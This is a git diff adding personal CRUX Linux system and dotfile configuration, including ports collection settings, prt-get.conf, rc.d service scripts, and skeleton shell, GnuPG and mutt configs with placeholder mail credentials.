+URL=git://git.leetio.dev/contrib.git
+BRANCH=stable-3.6
+destination=/usr/ports/contrib
+PORTS_DIR="/usr/ports"
diff --git a/linux/conf/ports/contrib.pub b/linux/conf/ports/contrib.pub
new file mode 100644
index 0000000..81d31e5
--- /dev/null
+++ b/linux/conf/ports/contrib.pub
@@ -0,0 +1,2 @@
+untrusted comment: contrib public key
+RWSagIOpLGJF3/J2edPyOdE4VWoyvvVvt3gdvOArUkvBrgSHjsBEdmrS
diff --git a/linux/conf/ports/core.git b/linux/conf/ports/core.git
new file mode 100644
index 0000000..13d1293
--- /dev/null
+++ b/linux/conf/ports/core.git
@@ -0,0 +1,7 @@
+# Collection core
+#
+NAME=core
+URL=git://git.leetio.dev/core.git
+BRANCH=stable-3.6
+destination=/usr/ports/core
+PORTS_DIR="/usr/ports"
diff --git a/linux/conf/ports/core.pub b/linux/conf/ports/core.pub
new file mode 100644
index 0000000..a09d3ac
--- /dev/null
+++ b/linux/conf/ports/core.pub
@@ -0,0 +1,2 @@
+untrusted comment: core public key
+RWRJc1FUaeVeqsGlEPc66dguintWWomCSORUNseged62IATuMVCK0zu6
diff --git a/linux/conf/ports/kde5.git b/linux/conf/ports/kde5.git
new file mode 100644
index 0000000..ebfdf39
--- /dev/null
+++ b/linux/conf/ports/kde5.git
@@ -0,0 +1,7 @@
+# Collection core
+#
+NAME=kde5
+URL=git://git.leetio.dev/kde5.git
+BRANCH=stable-3.6
+destination=/usr/ports/kde5
+PORTS_DIR="/usr/ports"
diff --git a/linux/conf/ports/mate.git b/linux/conf/ports/mate.git
new file mode 100644
index 0000000..d363694
--- /dev/null
+++ b/linux/conf/ports/mate.git
@@ -0,0 +1,7 @@
+# Collection mate
+#
+NAME=mate
+URL=git://git.leetio.dev/mate.git
+BRANCH=stable-3.6
+destination=/usr/ports/mate
+PORTS_DIR="/usr/ports"
diff --git a/linux/conf/ports/mate.httpup.inactive b/linux/conf/ports/mate.httpup.inactive
new file mode 100644
index 0000000..4b56167
--- /dev/null
+++ b/linux/conf/ports/mate.httpup.inactive
@@ -0,0 +1,5 @@
+# Collection mate, by jaeger at crux dot ninja
+# File generated by the CRUX portdb https://crux.nu/portdb/
+
+ROOT_DIR=/usr/ports/mate
+URL=https://raw.githubusercontent.com/mhoush/crux-mate/stable-3.5/
diff --git a/linux/conf/ports/opt.git b/linux/conf/ports/opt.git
new file mode 100644
index 0000000..fc04b6a
--- /dev/null
+++ b/linux/conf/ports/opt.git
@@ -0,0 +1,7 @@
+# Collection opt
+#
+NAME=opt
+URL=git://git.leetio.dev/opt.git
+BRANCH=stable-3.6
+destination=/usr/ports/opt
+PORTS_DIR="/usr/ports"
diff --git a/linux/conf/ports/opt.pub b/linux/conf/ports/opt.pub
new file mode 100644
index 0000000..346b688
--- /dev/null
+++ b/linux/conf/ports/opt.pub
@@ -0,0 +1,2 @@
+untrusted comment: opt public key
+RWSE3ohX2g5d/Zmwm/W4S8ZzNNTjXE7bI8XmnpawKOnQ+MiVa7TD0YC9
diff --git a/linux/conf/ports/utilities.git b/linux/conf/ports/utilities.git
new file mode 100644
index 0000000..345c6c5
--- /dev/null
+++ b/linux/conf/ports/utilities.git
@@ -0,0 +1,7 @@
+# Collection utilities
+#
+NAME=utilities
+URL=git://git.leetio.dev/utilities.git
+BRANCH=stable-3.6
+destination=/usr/ports/ports
+PORTS_DIR="/usr/ports"
diff --git a/linux/conf/ports/xorg.git b/linux/conf/ports/xorg.git
new file mode 100644
index 0000000..36ca311
--- /dev/null
+++ b/linux/conf/ports/xorg.git
@@ -0,0 +1,7 @@
+# Collection xorg
+#
+NAME=xorg
+URL=git://git.leetio.dev/xorg.git
+BRANCH=stable-3.6
+destination=/srv/ports/xorg
+PORTS_DIR="/usr/ports"
diff --git a/linux/conf/ports/xorg.pub b/linux/conf/ports/xorg.pub
new file mode 100644
index 0000000..983eb51
--- /dev/null
+++ b/linux/conf/ports/xorg.pub
@@ -0,0 +1,2 @@
+untrusted comment: xorg public key
+RWTSGWF5Q7TndIlWcgmz/x/4xBWLbyPRmI3LyI8rsN/iahlpFpgNIwSR
diff --git a/linux/conf/prt-get.conf b/linux/conf/prt-get.conf
new file mode 100644
index 0000000..c18b425
--- /dev/null
+++ b/linux/conf/prt-get.conf
@@ -0,0 +1,66 @@
+###
+### prt-get conf
+###
+
+# note: the order matters: the package found first is used
+prtdir /usr/ports/core
+prtdir /usr/ports/opt
+prtdir /usr/ports/xorg
+prtdir /usr/ports/contrib
+prtdir /usr/ports/utilities
+prtdir /usr/ports/mate
+#prtdir /usr/ports/kde5
+#prtdir /usr/ports/romster
+#prtdir /usr/ports/tb
+#prtdir /usr/ports/timcowchip
+#prtdir /usr/ports/6c37
+#prtdir /usr/ports/nilp
+#prtdir /usr/ports/nullspoon
+#prtdir /usr/ports/dbrooke
+#prtdir /usr/ports/pitillo
+
+# 6c37 team provides a collection with freetype-iu, fontconfig-iu
+# and cairo-iu ports.
+# the following line enables the user maintained contrib collection
+# prtdir /usr/ports/6c37-dropin
+# prtdir /usr/ports/6c37
+
+
+# the following line enables the multilib compat-32 collection
+#prtdir /usr/ports/compat-32
+
+### use mypackage form local directory
+# prtdir /home/packages/build:mypackage
+
+### log options:
+writelog enabled         # (enabled|disabled)
+logmode  overwrite       # (append|overwrite)
+rmlog_on_success yes     # (no|yes)
+logfile  /usr/ports/pkgbuild/%n-%v-%r.log
+                           # path, %p=path to port dir, %n=port name
+                           #       %v=version, %r=release
+
+### use alternate cache file (default: /var/lib/pkg/prt-get.cache
+# cachefile /mnt/nfs/cache
+
+### print README information:
+readme verbose           # (verbose|compact|disabled)
+
+### prefer higher versions in sysup / diff
+preferhigher yes     # (yes|no)
+
+### use regexp search
+# useregex no        # (yes|no)
+
+### run pre- and post-installs scripts; yes is equivalent to the
+### --install-scripts option
+runscripts yes            # (no|yes)
+
+
+### EXPERT SECTION ###
+
+### alternative commands
+makecommand      sudo -H -u pkgmk -g pkgmk fakeroot pkgmk
+addcommand       sudo pkgadd
+removecommand    sudo pkgrm
+runscriptcommand sudo sh
diff --git a/linux/conf/rc.conf b/linux/conf/rc.conf
new file mode 100644
index 0000000..6780fc3
--- /dev/null
+++ b/linux/conf/rc.conf
@@ -0,0 +1,12 @@
+#
+# /etc/rc.conf: system configuration
+#
+
+FONT=default
+KEYMAP=dvorak
+TIMEZONE="Europe/Lisbon"
+HOSTNAME=machine
+SYSLOG=sysklogd
+SERVICES=(lo iptables net crond)
+
+# End of file
diff --git a/linux/conf/rc.d/distccd b/linux/conf/rc.d/distccd
new file mode 100755
index 0000000..65a166d
--- /dev/null
+++ b/linux/conf/rc.d/distccd
@@ -0,0 +1,33 @@
+#!/usr/bin/env bash
+#
+# /etc/rc.d/distccd: start/stop distcc daemon
+#
+
+. /etc/distcc.conf
+if [ -z "$DISTCC_ALLOW" ]; then 
+    echo "Please define a range of IPs allowed to connect to this distccd"
+    echo "host in DISTCC_ALLOW in /etc/rc.conf. More detailed information"
+    echo "can be found in the distcc's README package."
+    exit 1
+fi
+
+DISTCC_USER="${DISTCC_USER:=nobody}"
+DISTCC_LOG_LEVEL="${DISTCC_LOG_LEVEL:=notice}"
+
+case $1 in
+start)
+	/usr/sbin/distccd --daemon --user "$DISTCC_USER" --allow "$DISTCC_ALLOW" --log-level "$DISTCC_LOG_LEVEL"
+	;;
+stop)
+	killall -q /usr/sbin/distccd
+	;;
+restart)
+	$0 stop
+	$0 start
+	;;
+*)
+	echo "usage: $0 [start|stop|restart]"
+	;;
+esac
+
+# End of file
diff --git a/linux/conf/rc.d/fcgiwrap b/linux/conf/rc.d/fcgiwrap
new file mode 100755
index 0000000..2059848
--- /dev/null
+++ b/linux/conf/rc.d/fcgiwrap
@@ -0,0 +1,41 @@
+#!/bin/sh
+#
+# /etc/rc.d/bird: start/stop fcgiwrapper
+#
+
+SSD=/sbin/start-stop-daemon
+NAME=fcgiwrap
+PROG=/usr/bin/spawn-fcgi
+USER=www
+GROUP=gitolite
+PIDFILE=/var/run/spawn_${NAME}.pid
+SOCKET=/var/run/fcgiwrap.sock
+OPTS="-u $USER -g $GROUP -P $PIDFILE -M 0660 -s $SOCKET -- /usr/sbin/${NAME}"
+
+
+case $1 in
+    start)
+        echo "Starting ${NAME}..."
+        $SSD --background --user $USER  --quiet --start --pidfile $PIDFILE --exec $PROG -- $OPTS
+    ;;
+stop)
+        echo "Stopping ${NAME}..."
+        $SSD --stop --remove-pidfile --retry 10 --pidfile $PIDFILE
+        ;;
+restart)
+        echo "Restarting ${NAME}..."
+        $0 stop
+        $0 start
+        ;;
+status)
+        $SSD --status --pidfile $PIDFILE
+        case $? in
+        0) echo "$PROG is running with pid $(cat $PIDFILE )" ;;
+        3) echo "$PROG is not running" ;;
+        4) echo "Unable to determine the program status" ;;
+        esac
+        ;;
+*)
+        echo "usage: $0 [start|stop|restart|status]"
+        ;;
+esac
diff --git a/linux/conf/rc.d/git-daemon b/linux/conf/rc.d/git-daemon
new file mode 100755
index 0000000..41793eb
--- /dev/null
+++ b/linux/conf/rc.d/git-daemon
@@ -0,0 +1,43 @@
+#!/bin/sh
+
+SSD=/sbin/start-stop-daemon
+NAME=git-daemon
+PROG=$(git --exec-path)/${NAME}
+USER=gitolite
+GROUP=gitolite
+PIDFILE=/var/run/git-daemon.pid
+REPOS=/srv/gitolite/repositories
+OPTS="--verbose --reuseaddr --base-path=${REPOS}"
+
+case $1 in
+    start)
+        echo "Starting ${NAME}..."
+        $SSD --start \
+            --pidfile ${PIDFILE} \
+            --exec ${PROG} -- ${OPTS} \
+            --detach --pid-file=${PIDFILE} \
+            --user=${USER} --group=${GROUP}
+
+    ;;
+    stop)
+        echo "Stopping ${NAME}..."
+        $SSD --stop --quiet --name git-daemon \
+                            --pidfile ${PIDFILE}
+        ;;
+    restart)
+        echo "Restarting ${NAME}..."
+        $0 stop
+        $0 start
+        ;;
+    status)
+        $SSD --status --pidfile $PIDFILE
+        case $? in
+        0) echo "$PROG is running with pid $(cat $PIDFILE )" ;;
+        3) echo "$PROG is not running" ;;
+        4) echo "Unable to determine the program status" ;;
+        esac
+        ;;
+    *)
+        echo "usage: $0 [start|stop|restart|status]"
+        ;;
+esac
diff --git a/linux/conf/rc.d/iptables b/linux/conf/rc.d/iptables
new file mode 100644
index 0000000..44f6bb2
--- /dev/null
+++ b/linux/conf/rc.d/iptables
@@ -0,0 +1,22 @@
+#!/bin/bash
+
+case $1 in
+	start)
+	    echo "clear all iptables tables"
+            #nohup bash /etc/iptables/ipt-start.sh &
+            nohup bash /etc/iptables/ipt-start.sh &
+	;;
+        stop)
+	    echo "clear all iptables tables"
+            nohup bash /etc/iptables/ipt-stop.sh &
+	;;
+	restart)
+        $0 start
+        ;;
+	status)
+		/usr/sbin/iptables -L -n -v
+	;;
+	*)
+	    echo "Usage: $0 [start|stop]"
+	;;
+esac
diff --git a/linux/conf/rc.d/net b/linux/conf/rc.d/net
new file mode 100755
index 0000000..a4c566a
--- /dev/null
+++ b/linux/conf/rc.d/net
@@ -0,0 +1,54 @@
+#!/bin/sh
+#
+# /etc/rc.d/net: start/stop network interface
+#
+
+# Connection type: "DHCP" or "static"
+TYPE="DHCP"
+
+# For "static" connections, specify your settings here:
+# To see your available devices run "ip link".
+DEV=ens3
+ADDR=192.168.1.100
+MASK=24
+GW=192.168.1.1
+
+# Optional settings:
+DHCPOPTS="-t 10"
+
+/sbin/ifconfig dummy down > /dev/null 2>&1
+/sbin/ifconfig dummy0 down > /dev/null 2>&1
+/sbin/ifconfig ifb0 down > /dev/null 2>&1
+/sbin/ifconfig ifb1 down > /dev/null 2>&1
+/sbin/ifconfig bond0 down > /dev/null 2>&1
+
+case $1 in
+	start)
+		if [ "${TYPE}" = "DHCP" ]; then
+			/sbin/dhcpcd ${DHCPOPTS}
+		else
+			/sbin/ip addr add ${ADDR}/${MASK} dev ${DEV} broadcast +
+			/sbin/ip link set ${DEV} up
+			/sbin/ip route add default via ${GW}
+		fi
+		;;
+	stop)
+		if [ "${TYPE}" = "DHCP" ]; then
+			/sbin/dhcpcd -x
+		else
+			/sbin/ip route del default
+			/sbin/ip link set ${DEV} down
+			/sbin/ip addr del ${ADDR}/${MASK} dev ${DEV}
+		fi
+		;;
+	restart)
+		$0 stop
+		$0 start
+		;;
+	*)
+		echo "Usage: $0 [start|stop|restart]"
+		;;
+esac
+
+# End of file
+
diff --git a/linux/conf/rc.d/postgresql b/linux/conf/rc.d/postgresql
new file mode 100755
index 0000000..5f0762a
--- /dev/null
+++ b/linux/conf/rc.d/postgresql
@@ -0,0 +1,16 @@
+#
+# /etc/rc.d/postgresql: start, stop or restart PostgreSQL server postmaster
+#
+
+PG_DATA=/srv/pgsql/data
+
+case "$1" in
+    start|stop|status|restart|reload)
+        sudo -u postgres pg_ctl -D "$PG_DATA" -l /var/log/postgresql "$1"
+        ;;
+    *)
+        echo "usage: $0 start|stop|restart|reload|status"
+        ;;
+esac
+
+# End of file
diff --git a/linux/conf/rc.d/wlan b/linux/conf/rc.d/wlan
new file mode 100755
index 0000000..9a2f935
--- /dev/null
+++ b/linux/conf/rc.d/wlan
@@ -0,0 +1,56 @@
+#!/bin/sh
+#
+# /etc/rc.d/wlan: start/stop wireless interface
+#
+
+DEV=wlp3s0
+
+
+SSD=/sbin/start-stop-daemon
+PROG_DHCP=/sbin/dhcpcd
+PROG_WIFI=/usr/sbin/wpa_supplicant
+PID_DHCP=/var/run/dhcpcd.pid
+PID_WIFI=/var/run/wpa_supplicant.pid
+
+OPTS_DHCP="--waitip -h $(/bin/hostname) -z $DEV"
+OPTS_WIFI="-B -P $PID_WIFI -D nl80211,wext -c /etc/wpa_supplicant.conf -i $DEV"
+
+
+print_status() {
+	$SSD --status --pidfile $2
+	case $? in
+	0) echo "$1 is running with pid $(cat $2)" ;;
+	1) echo "$1 is not running but the pid file $2 exists" ;;
+	3) echo "$1 is not running" ;;
+	4) echo "Unable to determine the program status" ;;
+	esac
+}
+
+case $1 in
+	start)
+		$SSD --start --pidfile $PID_WIFI --exec $PROG_WIFI -- $OPTS_WIFI && \
+		$SSD --start --pidfile $PID_DHCP --exec $PROG_DHCP -- $OPTS_DHCP
+		RETVAL=$?
+		;;
+	stop)
+		( $SSD --stop --retry 10 --pidfile $PID_DHCP 
+		  $SSD --stop --retry 10 --pidfile $PID_WIFI )
+		RETVAL=$?
+		;;
+	restart)
+		$0 stop
+		$0 start
+		;;
+	status)
+		print_status $PROG_WIFI $PID_WIFI
+		print_status $PROG_DHCP $PID_DHCP
+		;;
+	*)
+		echo "Usage: $0 [start|stop|restart|status]"
+		;;
+esac
+
+exit $RETVAL
+
+# End of file
+
diff --git a/linux/conf/resolv.conf b/linux/conf/resolv.conf
new file mode 100644
index 0000000..4c22142
--- /dev/null
+++ b/linux/conf/resolv.conf
@@ -0,0 +1,8 @@
+#
+# /etc/resolv.conf: resolver configuration file
+#
+
+#search <domain.org>
+#nameserver <ip-address>
+nameserver 213.73.91.35
+# End of file
diff --git a/linux/conf/skel/.bash_profile b/linux/conf/skel/.bash_profile
new file mode 100644
index 0000000..9ea6954
--- /dev/null
+++ b/linux/conf/skel/.bash_profile
@@ -0,0 +1,8 @@
+#!/bin/bash
+if [ -f ~/.profile ]; then
+   source ~/.profile
+fi
+
+if [ -f ~/.bashrc ]; then
+   source ~/.bashrc
+fi
diff --git a/linux/conf/skel/.bashrc b/linux/conf/skel/.bashrc
new file mode 100644
index 0000000..f562e3c
--- /dev/null
+++ b/linux/conf/skel/.bashrc
@@ -0,0 +1,73 @@
+# If not running interactively, don't do anything
+case $- in
+	*i*) ;;
+	*) return;;
+esac
+
+
+# check the window size after each command and, if necessary,
+# update the values of LINES and COLUMNS.
+shopt -s checkwinsize
+
+
+# don't put duplicate lines or lines starting with space in the history.
+# See bash(1) for more options
+HISTCONTROL=ignoreboth
+
+# append to the history file, don't overwrite it
+shopt -s histappend
+
+# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
+HISTSIZE=1000
+HISTFILESIZE=2000
+
+
+alias diff='diff --color=auto'
+alias grep='grep --color=auto'
+alias ls='ls -ph --color=auto'
+alias rm='rm -i'
+#alias cp='cp -i'
+alias mv='mv -i'
+# Prevents accidentally clobbering files.
+alias mkdir='mkdir -p'
+alias h='history'
+alias hg='history | grep'
+alias j='jobs -l'
+alias which='type -a'
+alias ..='cd ..'
+
+# Generate a password
+genpasswd () {
+    local l=$1
+    [ "$l" == "" ] && l=20
+    tr -dc A-Za-z0-9_ < /dev/urandom | head -c ${l} | xargs
+}
+
+# Git log
+glog () {
+    git log --stat --decorate
+}
+# Git graph log
+gloga () {
+    git log --graph --abbrev-commit --decorate --date=relative --all
+}
+
+alias tmux="tmux -2"
+
+# Virtual Crux machine
+alias c1.ank="ssh c1 -t tmux a"
+alias c2.ank="ssh c2 -t tmux a"
+alias c9.ank="ssh c9 -t tmux a"
+
+alias pkg_mirror="pkg_bin -f /usr/ports/mirror_bin_db"
+alias pkg_update="pkg_bin -r /usr/ports/mirror_bin_db"
+
+#if [[ -z "$TMUX" ]] ;then
+#    ID="`tmux ls | grep -vm1 attached | cut -d: -f1`" # get the id of a deattached session
+#    if [[ -z "$ID" ]] ;then # if not available create a new one
+#        tmux new-session
+#    else
+#        tmux attach-session -t "$ID" # if available attach to it
+#    fi
+#fi
+MAIL=/home/silvino/.mail/
diff --git a/linux/conf/skel/.gitconfig b/linux/conf/skel/.gitconfig
new file mode 100644
index 0000000..730d8d9
--- /dev/null
+++ b/linux/conf/skel/.gitconfig
@@ -0,0 +1,10 @@
+[core]
+	pager = less -F -X
+	editor = vim
+[diff]
+	tool = vimdiff
+[merge]
+	tool = vimdiff
+	conflictstyle = diff3
+[difftool]
+	prompt = false
diff --git a/linux/conf/skel/.gnupg/gpg.conf b/linux/conf/skel/.gnupg/gpg.conf
new file mode 100644
index 0000000..48edc58
--- /dev/null
+++ b/linux/conf/skel/.gnupg/gpg.conf
@@ -0,0 +1,136 @@
+# Options for GnuPG
+# Copyright 1998-2003, 2010 Free Software Foundation, Inc.
+# Copyright 1998-2003, 2010 Werner Koch
+#
+# This file is free software; as a special exception the author gives
+# unlimited permission to copy and/or distribute it, with or without
+# modifications, as long as this notice is preserved.
+#
+# This file is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY, to the extent permitted by law; without even the
+# implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+#
+# Unless you specify which option file to use (with the command line
+# option "--options filename"), GnuPG uses the file ~/.gnupg/gpg.conf
+# by default.
+#
+# An options file can contain any long options which are available in
+# GnuPG. If the first non white space character of a line is a '#',
+# this line is ignored.  Empty lines are also ignored.
+#
+# See the gpg man page for a list of options.
+
+
+# If you have more than 1 secret key in your keyring, you may want to
+# uncomment the following option and set your preferred keyid.
+
+#default-key 621CC013
+
+
+# If you do not pass a recipient to gpg, it will ask for one.  Using
+# this option you can encrypt to a default key.  Key validation will
+# not be done in this case.  The second form uses the default key as
+# default recipient.
+
+#default-recipient some-user-id
+#default-recipient-self
+
+
+# Group names may be defined like this:
+#   group mynames = paige 0x12345678 joe patti
+#
+# Any time "mynames" is a recipient (-r or --recipient), it will be
+# expanded to the names "paige", "joe", and "patti", and the key ID
+# "0x12345678".  Note there is only one level of expansion - you
+# cannot make an group that points to another group.  Note also that
+# if there are spaces in the recipient name, this will appear as two
+# recipients.  In these cases it is better to use the key ID.
+
+#group mynames = paige 0x12345678 joe patti
+
+
+# GnuPG can automatically locate and retrieve keys as needed using
+# this option.  This happens when encrypting to an email address (in
+# the "user@@example.com" form) and there are no keys matching
+# "user@example.com" in the local keyring.  This option takes any
+# number mechanisms which are tried in the given order.  The default
+# is "--auto-key-locate local" to search for keys only in the local
+# key database.  Uncomment the next line to locate a missing key using
+# two DNS based mechanisms.
+
+#auto-key-locate local,pka,dane
+
+
+# Common options for keyserver functions:
+# (Note that the --keyserver option has been moved to dirmngr.conf)
+#
+# include-disabled = when searching, include keys marked as "disabled"
+#                    on the keyserver (not all keyservers support this).
+#
+# no-include-revoked = when searching, do not include keys marked as
+#                      "revoked" on the keyserver.
+#
+# verbose = show more information as the keys are fetched.
+#           Can be used more than once to increase the amount
+#           of information shown.
+#
+# auto-key-retrieve = automatically fetch keys as needed from the keyserver
+#                     when verifying signatures or when importing keys that
+#                     have been revoked by a revocation key that is not
+#                     present on the keyring.
+#
+# no-include-attributes = do not include attribute IDs (aka "photo IDs")
+#                         when sending keys to the keyserver.
+
+#keyserver-options auto-key-retrieve
+
+
+# Uncomment this line to display photo user IDs in key listings and
+# when a signature from a key with a photo is verified.
+
+#show-photos
+
+
+# Use this program to display photo user IDs
+#
+# %i is expanded to a temporary file that contains the photo.
+# %I is the same as %i, but the file isn't deleted afterwards by GnuPG.
+# %k is expanded to the key ID of the key.
+# %K is expanded to the long OpenPGP key ID of the key.
+# %t is expanded to the extension of the image (e.g. "jpg").
+# %T is expanded to the MIME type of the image (e.g. "image/jpeg").
+# %f is expanded to the fingerprint of the key.
+# %% is %, of course.
+#
+# If %i or %I are not present, then the photo is supplied to the
+# viewer on standard input.  If your platform supports it, standard
+# input is the best way to do this as it avoids the time and effort in
+# generating and then cleaning up a secure temp file.
+#
+# The default program is "xloadimage -fork -quiet -title 'KeyID 0x%k' stdin"
+# On Mac OS X and Windows, the default is to use your regular JPEG image
+# viewer.
+#
+# Some other viewers:
+# photo-viewer "qiv %i"
+# photo-viewer "ee %i"
+# photo-viewer "display -title 'KeyID 0x%k'"
+#
+# This one saves a copy of the photo ID in your home directory:
+# photo-viewer "cat > ~/photoid-for-key-%k.%t"
+#
+# Use your MIME handler to view photos:
+# photo-viewer "metamail -q -d -b -c %T -s 'KeyID 0x%k' -f GnuPG"
+
+
+# Because some mailers change lines starting with "From " to ">From "
+# it is good to handle such lines in a special way when creating
+# cleartext signatures; all other PGP versions do it this way too.
+# To enable full OpenPGP compliance you may want to use this option.
+
+#no-escape-from-lines
+
+
+# Uncomment the following option to get rid of the copyright notice
+
+#no-greeting
diff --git a/linux/conf/skel/.mutt/external b/linux/conf/skel/.mutt/external
new file mode 100644
index 0000000..8ade1b1
--- /dev/null
+++ b/linux/conf/skel/.mutt/external
@@ -0,0 +1,27 @@
+color status blue default
+
+unset sendmail
+
+set folder="~/.mailext"
+set mbox_type=Maildir
+set spoolfile="~/.mailext"
+set keep_flagged=yes            # esc-f to mark messages in spool, and
+
+set mbox="~/.mailext"
+set postponed="+.Drafts"
+set record="+.Sent"
+
+set use_from=yes
+set ssl_starttls=yes
+set ssl_force_tls = yes
+
+set realname='User Name'
+set from=mail@external.org
+
+set pop_user="mail@external.org"
+set pop_pass="password"
+set pop_delete=yes
+set pop_host="pops://$pop_user:$pop_pass@pop.external.org:995"
+
+set smtp_url="smtps://$pop_user:$pop_pass@smtp.external.org/"
+
diff --git a/linux/conf/skel/.mutt/gpg.rc b/linux/conf/skel/.mutt/gpg.rc
new file mode 100644
index 0000000..2ef0ae2
--- /dev/null
+++ b/linux/conf/skel/.mutt/gpg.rc
@@ -0,0 +1,88 @@
+# -*-muttrc-*-
+#
+# Command formats for gpg.
+# 
+# This version uses gpg-2comp from 
+#   http://70t.de/download/gpg-2comp.tar.gz
+#
+# $Id$
+#
+# %p    The empty string when no passphrase is needed,
+#       the string "PGPPASSFD=0" if one is needed.
+#
+#       This is mostly used in conditional % sequences.
+#
+# %f    Most PGP commands operate on a single file or a file
+#       containing a message.  %f expands to this file's name.
+#
+# %s    When verifying signatures, there is another temporary file
+#       containing the detached signature.  %s expands to this
+#       file's name.
+#
+# %a    In "signing" contexts, this expands to the value of the
+#       configuration variable $pgp_sign_as.  You probably need to
+#       use this within a conditional % sequence.
+#
+# %r    In many contexts, mutt passes key IDs to pgp.  %r expands to
+#       a list of key IDs.
+
+# Note that we explicitly set the comment armor header since GnuPG, when used
+# in some localiaztion environments, generates 8bit data in that header, thereby
+# breaking PGP/MIME.
+
+# decode application/pgp
+set pgp_decode_command="gpg --status-fd=2 %?p?--passphrase-fd 0? --no-verbose --quiet --batch --output - %f"
+
+# verify a pgp/mime signature
+set pgp_verify_command="gpg --status-fd=2 --no-verbose --quiet --batch --output - --verify %s %f"
+
+# decrypt a pgp/mime attachment
+set pgp_decrypt_command="gpg --status-fd=2 %?p?--passphrase-fd 0? --no-verbose --quiet --batch --output - %f"
+
+# create a pgp/mime signed attachment
+# set pgp_sign_command="gpg-2comp --comment '' --no-verbose --batch --output - %?p?--passphrase-fd 0? --armor --detach-sign --textmode %?a?-u %a? %f"
+set pgp_sign_command="gpg --no-verbose --batch --quiet --output - %?p?--passphrase-fd 0? --armor --detach-sign --textmode %?a?-u %a? %f"
+
+# create a application/pgp signed (old-style) message
+# set pgp_clearsign_command="gpg-2comp --comment '' --no-verbose --batch --output - %?p?--passphrase-fd 0? --armor --textmode --clearsign %?a?-u %a? %f"
+set pgp_clearsign_command="gpg --no-verbose --batch --quiet --output - %?p?--passphrase-fd 0? --armor --textmode --clearsign %?a?-u %a? %f"
+
+# create a pgp/mime encrypted attachment
+# set pgp_encrypt_only_command="pgpewrap gpg-2comp -v --batch --output - --encrypt --textmode --armor --always-trust -- -r %r -- %f"
+set pgp_encrypt_only_command="pgpewrap gpg --batch --quiet --no-verbose --output - --encrypt --textmode --armor --always-trust -- -r %r -- %f"
+
+# create a pgp/mime encrypted and signed attachment
+# set pgp_encrypt_sign_command="pgpewrap gpg-2comp %?p?--passphrase-fd 0? -v --batch --output - --encrypt --sign %?a?-u %a? --armor --always-trust -- -r %r -- %f"
+set pgp_encrypt_sign_command="pgpewrap gpg %?p?--passphrase-fd 0? --batch --quiet --no-verbose --textmode --output - --encrypt --sign %?a?-u %a? --armor --always-trust -- -r %r -- %f"
+
+# import a key into the public key ring
+set pgp_import_command="gpg --no-verbose --import %f"
+
+# export a key from the public key ring
+set pgp_export_command="gpg --no-verbose --export --armor %r"
+
+# verify a key
+set pgp_verify_key_command="gpg --verbose --batch --fingerprint --check-sigs %r"
+
+# read in the public key ring
+set pgp_list_pubring_command="gpg --no-verbose --batch --quiet --with-colons --with-fingerprint --with-fingerprint --list-keys %r"
+
+# read in the secret key ring
+set pgp_list_secring_command="gpg --no-verbose --batch --quiet --with-colons --with-fingerprint --with-fingerprint --list-secret-keys %r"
+
+# fetch keys
+# set pgp_getkeys_command="pkspxycwrap %r"
+
+# pattern for good signature - may need to be adapted to locale!
+
+# set pgp_good_sign="^gpgv?: Good signature from "
+
+# OK, here's a version which uses gnupg's message catalog:
+# set pgp_good_sign="`gettext -d gnupg -s 'Good signature from "' | tr -d '"'`"
+
+# This version uses --status-fd messages
+set pgp_good_sign="^\\[GNUPG:\\] GOODSIG"
+
+# pattern to verify a decryption occurred
+set pgp_decryption_okay="^\\[GNUPG:\\] DECRYPTION_OKAY"
+
diff --git a/linux/conf/skel/.mutt/mail_alias b/linux/conf/skel/.mutt/mail_alias
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/linux/conf/skel/.mutt/mail_alias
diff --git a/linux/conf/skel/.mutt/muttrc b/linux/conf/skel/.mutt/muttrc
new file mode 100644
index 0000000..6ec1da4
--- /dev/null
+++ b/linux/conf/skel/.mutt/muttrc
@@ -0,0 +1,60 @@
+set config_charset="utf-8"
+# set locale="de_CH"
+set charset="utf-8"
+set send_charset="utf-8"
+set editor="vim"
+set visual=vim
+set auto_tag
+set sort=threads
+
+set sort_browser=reverse-date
+set sort_aux=reverse-last-date-received
+set duplicate_threads=yes
+
+set crypt_use_gpgme=yes
+
+## automatically sign all outgoing messages
+set crypt_autosign=yes
+
+## automatically encrypt outgoing messages
+set crypt_autoencrypt=yes
+
+## automatically verify the sign of a message when opened
+set crypt_verify_sig=yes
+
+set pgp_sign_as=0x8BF422F79FC7C975BDF07828E88440BC35095A74
+#set pgp_sign_as=0x8BF422F7
+set pgp_timeout=1800
+set pgp_autosign=yes
+#set pgp_replyencrypt=yes
+
+source ~/.mutt/gpg.rc
+
+source "~/.mutt/mail_alias"
+set alias_file=~/.mutt/mail_alias
+
+# Header
+set header_cache =~/.mutt/cache/headers
+set message_cachedir =~/.mutt/cache/bodies
+set certificate_file =~/.mutt/certificates
+
+set timeout=10    # mutt 'presses' (like) a key for you 
+                  #(while you're idle) each x sec to trigger 
+                  #the thing below
+set mail_check=5  # mutt checks for new mails on every keystroke
+                  # but not more often then once in 5 seconds
+set beep_new      # beep on new messages in the mailboxes
+
+## Local system account
+folder-hook '.mail' 'source ~/.mutt/system'
+
+## Remote account
+folder-hook '.mailext' 'source ~/.mutt/external'
+
+## Default account
+source ~/.mutt/system
+
+## Shortcuts
+macro index,pager <f3> '<sync-mailbox><enter-command>source ~/.mutt/external<enter><change-folder>!<enter>'
+
+macro index,pager <f2> '<sync-mailbox><enter-command>source ~/.mutt/system<enter><change-folder>!<enter>'
diff --git a/linux/conf/skel/.mutt/system b/linux/conf/skel/.mutt/system
new file mode 100644
index 0000000..ae23778
--- /dev/null
+++ b/linux/conf/skel/.mutt/system
@@ -0,0 +1,25 @@
+color status green default
+
+set folder="~/.mail"
+set mbox_type=Maildir
+set spoolfile=/var/spool/mail/username
+set keep_flagged=yes
+
+set mbox="~/.mail"           # ~/.mailext/read_inbox
+set postponed="+.Drafts"
+set record="+.Sent"
+
+set use_from=yes
+
+set sendmail=/usr/sbin/exim
+set ssl_starttls=no
+set ssl_force_tls=no
+
+unset pop_user
+unset pop_pass
+unset pop_delete
+unset pop_host
+unset smtp_url
+
+set realname='username'
+set from=username@localhost
diff --git a/linux/conf/skel/.profile b/linux/conf/skel/.profile
new file mode 100644
index 0000000..7e15d10
--- /dev/null
+++ b/linux/conf/skel/.profile
@@ -0,0 +1,36 @@
